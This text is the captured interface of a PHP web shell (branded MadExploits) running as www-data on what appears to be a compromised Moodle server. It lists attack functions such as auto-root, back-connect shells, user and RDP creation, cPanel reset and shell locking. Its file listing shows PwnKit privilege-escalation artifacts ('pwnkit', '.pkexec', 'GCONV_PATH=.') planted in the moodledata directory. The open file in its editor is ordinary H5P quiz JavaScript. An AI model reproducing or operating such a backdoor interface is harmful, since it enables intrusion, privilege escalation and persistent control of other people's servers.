Linux moodl-moodle-3s8bw1nuh5yqd9-5b875fdd66-8hs4m 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64
Apache/2.4.41 (Ubuntu)
: 10.39.0.36 | : 10.36.0.0
Cant Read [ /etc/named.conf ]
7.4.3
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
moodledata /
filedir /
1b /
3f /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
1b3f8579a2e3f1d098d787298639a9...
1
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 1b3f8579a2e3f1d098d787298639a9012eb2f798
var H5PPresave = H5PPresave || {}; /** * Resolve the presave logic for the content type Fill in the Blanks * * @param {object} content * @param finished * @constructor */ H5PPresave['H5P.Blanks'] = function (content, finished) { var presave = H5PEditor.Presave; if (isContentInvalid()) { throw { name: 'Invalid Fill in the blanks Error', message: 'Could not find expected semantics in content.' }; } var score = content.questions .map(function (question) { var pattern = /\*[^\*]+\*/g; var matches = question.match(pattern); return Array.isArray(matches) ? matches.length : 0; }) .reduce(function (previous, current) { return previous + current; }, 0); presave.validateScore(score); finished({maxScore: score}); /** * Check if required parameters is present * @return {boolean} */ function isContentInvalid() { return !presave.checkNestedRequirements(content, 'content.questions') || !Array.isArray(content.questions); } };
Close